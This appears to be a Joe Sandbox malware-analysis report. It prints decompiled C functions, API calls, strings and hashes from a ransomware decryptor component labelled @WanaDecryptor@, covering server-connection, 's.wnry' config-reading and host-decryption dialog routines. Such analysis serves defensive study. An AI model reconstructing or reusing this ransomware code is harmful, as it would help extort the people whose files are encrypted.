C-Code - Quality: 91%

			E00401140() {
				intOrPtr _v4;
				void* _t17;
				struct HWND__* _t18;
				void* _t23;
				intOrPtr _t24;

				_t23 = _t17;
				L00412CB0();
				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
				_t18 =  *(_t23 + 0x80);
				SendMessageA(_t18, 0x401, 0, 0x280000);
				_push(_t18);
				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
				_v4 = _t24;
				L00412CAA();
				E00401970("Connecting to server...");
				 *(_t23 + 0xa8) = 0;
				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0);
				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
					 *((intOrPtr*)(_t23 + 0xac)) = CreateThread(0, 0, E004012D0, _t23, 0, 0);
				}
				return 1;
			}

0x00401143
0x00401145
0x00401160
0x00401162
0x00401175
0x00401177
0x00401178
0x00401184
0x0040118d
0x00401194
0x004011a9
0x004011b3
0x004011c1
0x004011d7
0x004011d7
0x004011e5

APIs

#4710.MFC42 ref: 00401145
SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
#537.MFC42(Connecting to server...), ref: 0040118D

Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF

SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1

Strings

Connecting to server..., xrefs: 00401188

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
String ID: Connecting to server...
API String ID: 3305248171-1849848738
Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99

Uniqueness

Uniqueness Score: -1.00%

Function 00402F10 Relevance: 10.6, APIs: 7, Instructions: 139COMMON

Download Yara Rule

APIs

?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
String ID:
API String ID: 2613176527-0
Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00407F80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101
fileCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00407F80(void* __ecx) {
				struct _IO_FILE* _t24;
				void* _t30;
				void* _t37;
				void* _t38;
				signed int _t45;
				signed int _t48;
				signed int _t51;
				unsigned int _t53;
				signed int _t54;
				void* _t66;
				struct _IO_FILE* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;

				_t79 = __ecx;
				 *((char*)(_t81 + 0xc)) = 0;
				memset(_t81 + 0xd, 0, 0xc << 2);
				_t82 = _t81 + 0xc;
				asm("stosb");
				 *((intOrPtr*)(_t82 + 0x40)) = 0;
				memset(_t82 + 0x44, 0, 0x21 << 2);
				_t24 = fopen("00000000.res", "rb");
				_t76 = _t24;
				_t84 = _t82 + 0x14;
				_t89 = _t76;
				if(_t76 != 0) {
					fread(_t84 + 0x48, 0x88, 1, _t76);
					fclose(_t76);
					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
					_t45 = _t84 + 0x60;
					_push(_t84 + 0x2c);
					_t66 = _t79 + 0x5f0;
					_push("+++");
					_push(_t45);
					_push(_t66);
					_t30 = E0040C4F0(_t38, _t45, _t89);
					_t85 = _t84 + 0x30;
					_t77 = _t30;
					E0040C670();
					_t90 = _t77 - 0xffffffff;
					if(_t77 == 0xffffffff) {
						_push(_t85 + 0xc);
						_push("+++");
						_push(_t85 + 0x40);
						_push(_t66);
						_t37 = E0040C4F0(_t38, _t45, _t90);
						_t85 = _t85 + 0x10;
						_t77 = _t37;
					}
					_t24 = E0040C670();
					if(_t77 == 1) {
						_t24 = 0;
						asm("repne scasb");
						_t48 =  !(_t45 | 0xffffffff) - 1;
						if(_t48 >= 0x1e) {
							asm("repne scasb");
							_t51 =  !(_t48 | 0xffffffff) - 1;
							if(_t51 < 0x32) {
								asm("repne scasb");
								_t53 =  !(_t51 | 0xffffffff);
								_t78 = _t85 + 0xc - _t53;
								_t54 = _t53 >> 2;
								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
								return E00401A10(_t79 + 0x50c, 0);
							}
						}
					}
				}
				return _t24;
			}

0x00407f88
0x00407f96
0x00407f9b
0x00407f9b
0x00407f9d
0x00407fa9
0x00407fbb
0x00407fbd
0x00407fc3
0x00407fc5
0x00407fc8
0x00407fca
0x00407fdd
0x00407fe4
0x00407ffd
0x00408006
0x0040800a
0x0040800b
0x00408011
0x00408016
0x00408017
0x00408018
0x0040801d
0x00408020
0x00408022
0x00408027
0x0040802a
0x00408034
0x00408035
0x0040803a
0x0040803b
0x0040803c
0x00408041
0x00408044
0x00408044
0x00408046
0x0040804e
0x00408057
0x00408059
0x0040805d
0x00408061
0x0040806a
0x0040806e
0x00408072
0x0040807b
0x0040807d
0x00408089
0x00408093
0x004080a0
0x00000000
0x004080a7
0x00408072
0x00408061
0x0040804e
0x004080b3

APIs

fopen.MSVCRT ref: 00407FBD
fread.MSVCRT ref: 00407FDD
fclose.MSVCRT ref: 00407FE4

Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE

Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628

Strings

s.wnry, xrefs: 00407FF8
00000000.res, xrefs: 00407FB6
+++, xrefs: 00408011, 00408035

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: strncpy$fclosefopenfread
String ID: +++$00000000.res$s.wnry
API String ID: 3363958884-869915597
Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696

Uniqueness

Uniqueness Score: -1.00%

Function 00401220 Relevance: 10.6, APIs: 7, Instructions: 53
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401220(void* __ecx, long _a4) {
				long _t11;
				void* _t26;

				_t11 = _a4;
				_t26 = __ecx;
				if(_t11 != 0x3e9) {
					L8:
					L00412CBC();
					return _t11;
				}
				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
					KillTimer( *(_t26 + 0x20), 0x3e9);
					L00412B66();
				}
				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0);
				}
				_t11 =  *(_t26 + 0xa0);
				if(_t11 == 0) {
					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
					if(_t11 == 0xf) {
						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
					}
				}
				goto L8;
			}

0x00401220
0x0040122b
0x0040122d
0x004012c2
0x004012c4
0x004012cb
0x004012cb
0x00401241
0x00401253
0x0040125e
0x00401266
0x00401266
0x00401283
0x00401295
0x00401295
0x00401297
0x0040129f
0x004012b1
0x004012b6
0x004012b8
0x004012b8
0x004012b6
0x00000000

APIs

SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
KillTimer.USER32(?,000003E9), ref: 0040125E
#4853.MFC42 ref: 00401266
SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
#2379.MFC42 ref: 004012C4

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#2379#4853KillTimer
String ID:
API String ID: 178170520-0
Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58

Uniqueness

Uniqueness Score: -1.00%

Function 00403860 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00403860(void* __ecx) {
				int _t6;
				long _t7;
				void* _t9;
				void* _t14;

				_t14 = __ecx;
				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
				_push(0);
				if(_t6 != 0xffffffff) {
					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
					if(_t7 != 0) {
						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
						 *(_t14 + 0xf4) = _t9;
						return _t9;
					}
					return _t7;
				} else {
					_push(0);
					_push("Please select a host to decrypt.");
					L00412CC8();
					return _t6;
				}
			}

0x00403861
0x0040387a
0x0040387f
0x00403881
0x0040389f
0x004038a3
0x004038b5
0x004038c5
0x004038cb
0x00000000
0x004038cb
0x004038d3
0x00403883
0x00403883
0x00403885
0x0040388a
0x00403891
0x00403891

APIs

SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
#1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5

Strings

Please select a host to decrypt., xrefs: 00403885

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#1200CreateThread
String ID: Please select a host to decrypt.
API String ID: 3616405048-3459725315
Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668

Uniqueness

Uniqueness Score: -1.00%

Function 004044C0 Relevance: 10.5, APIs: 7, Instructions: 38
windowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004044C0(void* __ecx, long _a4) {
				struct tagLOGFONTA _v72;
				long _t10;
				struct HFONT__* _t13;
				struct HWND__* _t15;
				void* _t21;

				_t10 = _a4;
				_t21 = __ecx;
				if(_t10 != 0) {
					L2:
					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
					_v72.lfUnderline = 1;
					_t13 = CreateFontIndirectA( &_v72);
					_push(_t13);
					L00412D5E();
					 *((char*)(_t21 + 0x58)) = 1;
					return _t13;
				}
				_t15 = GetParent( *(__ecx + 0x20));
				_push(_t15);
				L00412DAC();
				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
				_push(_t10);
				L00412DE2();
				if(_t10 != 0) {
					goto L2;
				}
				return _t10;
			}

0x004044c0
0x004044ca
0x004044cc
0x004044f8
0x00404503
0x0040450d
0x00404513
0x00404519
0x0040451d
0x00404522
0x00000000
0x00404522
0x004044d2
0x004044d8
0x004044d9
0x004044e8
0x004044ee
0x004044ef
0x004044f6
0x00000000
0x00000000
0x0040452a

APIs

GetParent.USER32(?), ref: 004044D2
#2864.MFC42(00000000), ref: 004044D9
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
#2860.MFC42(00000000), ref: 004044EF
GetObjectA.GDI32(?,0000003C,?), ref: 00404503
CreateFontIndirectA.GDI32(?), ref: 00404513
#1641.MFC42(00000000), ref: 0040451D

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
String ID:
API String ID: 2724197214-0
Opcode ID: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
Opcode Fuzzy Hash: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769

Uniqueness

Uniqueness Score: -1.00%

Function 0040C060 Relevance: 9.1, APIs: 6, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040C060(void* __ecx, void* __eflags) {
				void* _t35;
				int _t45;
				struct HWND__* _t56;
				signed int _t58;
				int _t59;
				intOrPtr* _t65;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t73;
				intOrPtr* _t75;
				struct HWND__* _t87;
				intOrPtr _t92;
				void* _t93;

				_push(0xffffffff);
				_push(E004142BB);
				 *[fs:0x0] = _t92;
				E00413060(0x2408, __ecx,  *[fs:0x0]);
				_push(_t58);
				E0040DBB0(_t92 + 0x18, 0x1000);
				 *(_t92 + 0x241c) = 0;
				_push(_t92 + 0x14);
				_t59 = _t58 | 0xffffffff;
				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
				_t93 = _t92 + 0x10;
				if(_t35 == 0) {
					_t87 =  *(_t93 + 0x2430);
					if(_t87 != 0) {
						SendMessageA(_t87, 0x4e20, 0, 0);
					}
					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
					_t65 =  *0x422210; // 0xa94228
					_push(0);
					_push(E0040DD40(_t93 + 0x1c));
					_push(E0040DD30(_t93 + 0x20));
					_push(7);
					if( *((intOrPtr*)( *_t65 + 0x18))() >= 0) {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0, 0);
						}
						_t69 =  *0x422210; // 0xa94228
						_push(_t93 + 0x10);
						_push(_t93 + 0x102c);
						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
						_push(_t93 + 0x17);
						if( *((intOrPtr*)( *_t69 + 0x1c))() >= 0) {
							if( *((char*)(_t93 + 0xf)) == 7) {
								_t59 = 0;
							}
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, _t59, 0);
							}
							_t70 =  *0x422210; // 0xa94228
							 *((intOrPtr*)( *_t70 + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							goto L21;
						} else {
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
							}
							_t73 =  *0x422210; // 0xa94228
							 *((intOrPtr*)( *_t73 + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
						}
					} else {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
						}
						_t75 =  *0x422210; // 0xa94228
						 *((intOrPtr*)( *_t75 + 0xc))();
						 *(_t93 + 0x241c) = 0xffffffff;
						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
					}
				} else {
					_t56 =  *(_t93 + 0x2430);
					if(_t56 != 0) {
						SendMessageA(_t56, 0x4e20, _t59, 0);
					}
					 *(_t93 + 0x241c) = _t59;
					L21:
					E0040DBF0(_t93 + 0x14);
					_t45 = _t59;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
				return _t45;
			}

0x0040c066
0x0040c068
0x0040c073
0x0040c07a
0x0040c07f
0x0040c08b
0x0040c0a2
0x0040c0ad
0x0040c0b2
0x0040c0b5
0x0040c0ba
0x0040c0bf
0x0040c0e7
0x0040c0f6
0x0040c102
0x0040c102
0x0040c111
0x0040c116
0x0040c11c
0x0040c129
0x0040c139
0x0040c13a
0x0040c142
0x0040c17d
0x0040c189
0x0040c189
0x0040c18b
0x0040c195
0x0040c19d
0x0040c19e
0x0040c1ac
0x0040c1b2
0x0040c1ed
0x0040c1ef
0x0040c1ef
0x0040c1f3
0x0040c1fe
0x0040c1fe
0x0040c200
0x0040c208
0x0040c20b
0x00000000
0x0040c1b4
0x0040c1b6
0x0040c1c2
0x0040c1c2
0x0040c1c4
0x0040c1cc
0x0040c1d3
0x0040c1e3
0x0040c1e3
0x0040c144
0x0040c146
0x0040c152
0x0040c152
0x0040c154
0x0040c15c
0x0040c163
0x0040c173
0x0040c173
0x0040c0c1
0x0040c0c1
0x0040c0ca
0x0040c0d5
0x0040c0d5
0x0040c0db
0x0040c216
0x0040c21a
0x0040c21f
0x0040c21f
0x0040c22b
0x0040c238

APIs

Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C

SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#823
String ID:
API String ID: 3019263841-0
Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00409C20 Relevance: 9.1, APIs: 6, Instructions: 104
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v0;
				char _v4;
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _t29;
				intOrPtr _t31;
				long _t36;
				intOrPtr _t38;
				intOrPtr* _t41;
				struct HWND__* _t47;
				intOrPtr _t48;
				long _t53;
				struct HWND__* _t58;
				signed int _t60;
				intOrPtr* _t67;
				signed int _t68;

				_t67 = __ecx;
				L00412FE6();
				_t68 = __eax;
				if((__eax & 0x00008000) != 0) {
					_push( &_v8);
					_push( &_v4);
					L00412FFE();
					if(_a4 == 0) {
						_t60 = _v0;
						_t41 = _v16;
					} else {
						_t58 =  *(__ecx + 0x20);
						_t36 = SendMessageA(_t58, 0x408, 0, 0);
						_t41 = _v16;
						_t53 = _t36;
						if(_t53 == _t41) {
							_t38 =  *((intOrPtr*)(_t67 + 0x68));
							_t58 =  *(_t67 + 0x6c);
							if(_t53 - _t38 < _t58) {
								_t53 = _t58 + _t38;
							}
						}
						asm("cdq");
						_t60 = (_v0 ^ _t58) - _t58 + _t53;
					}
					_t47 =  *(_t67 + 0x6c);
					_t29 = _t47 + _t41;
					if(_t60 <= _t29) {
						if(_t60 >= _t41) {
							InvalidateRect( *(_t67 + 0x20), 0, 1);
						}
					} else {
						_t60 = _t60 + _v12 - _t47 - _t41;
						if(_t60 > _t29) {
							_t60 = _t29;
						}
						_push(0);
						if((_t68 & 0x00004000) == 0) {
							_push(0x4000);
							_push(0);
							L00412DDC();
						} else {
							_push(0);
							_push(0x4000);
							L00412DDC();
						}
					}
					_t48 = _v12;
					_t31 = _t60 -  *(_t67 + 0x6c);
					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
					if(_t31 < _t48) {
						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
					}
					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
					return 1;
				} else {
					return 0;
				}
			}

0x00409c25
0x00409c27
0x00409c2c
0x00409c34
0x00409c4a
0x00409c4b
0x00409c4e
0x00409c59
0x00409c98
0x00409c9c
0x00409c5b
0x00409c5b
0x00409c68
0x00409c6e
0x00409c72
0x00409c76
0x00409c78
0x00409c7b
0x00409c84
0x00409c86
0x00409c86
0x00409c84
0x00409c8d
0x00409c94
0x00409c94
0x00409ca0
0x00409ca3
0x00409ca8
0x00409ce6
0x00409cf0
0x00409cf0
0x00409caa
0x00409cb2
0x00409cb6
0x00409cb8
0x00409cb8
0x00409cc0
0x00409cc2
0x00409cd4
0x00409cd9
0x00409cdd
0x00409cc4
0x00409cc4
0x00409cc6
0x00409ccd
0x00409ccd
0x00409cc2
0x00409cf9
0x00409cff
0x00409d03
0x00409d06
0x00409d08
0x00409d08
0x00409d24
0x00409d2f
0x00409c37
0x00409c3d
0x00409c3d

APIs

#3797.MFC42 ref: 00409C27
#6734.MFC42(?,?), ref: 00409C4E
SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
#4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #3797#4284#6734MessageSend
String ID:
API String ID: 1776784669-0
Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
